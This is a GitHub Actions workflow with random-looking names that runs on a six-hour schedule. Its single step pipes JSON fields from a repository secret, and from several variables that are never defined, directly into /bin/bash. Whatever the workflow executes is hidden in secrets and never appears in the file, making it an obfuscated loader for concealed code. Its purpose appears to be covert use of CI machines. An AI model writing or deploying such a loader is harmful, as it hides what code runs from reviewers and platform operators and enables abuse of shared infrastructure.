name: niubenghen8710

on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: niubenghen8710
        env:
          clfx00623: ${{ secrets.clfx00623 }}
        run: |
          echo $clfx00623 | jq -r .hgg86 | /bin/bash
          echo $tnz97838 | jq -r .ew83 | /bin/bash
          echo $yxor6099 | jq -r .tewsp6 | /bin/bash
          echo $yns302 | jq -r .fmkxw0 | /bin/bash
          echo $pmifj492 | jq -r .ge5520 | /bin/bash
          echo $vvc25736 | jq -r .k86 | /bin/bash
          echo $tg690 | jq -r .fb2 | /bin/bash

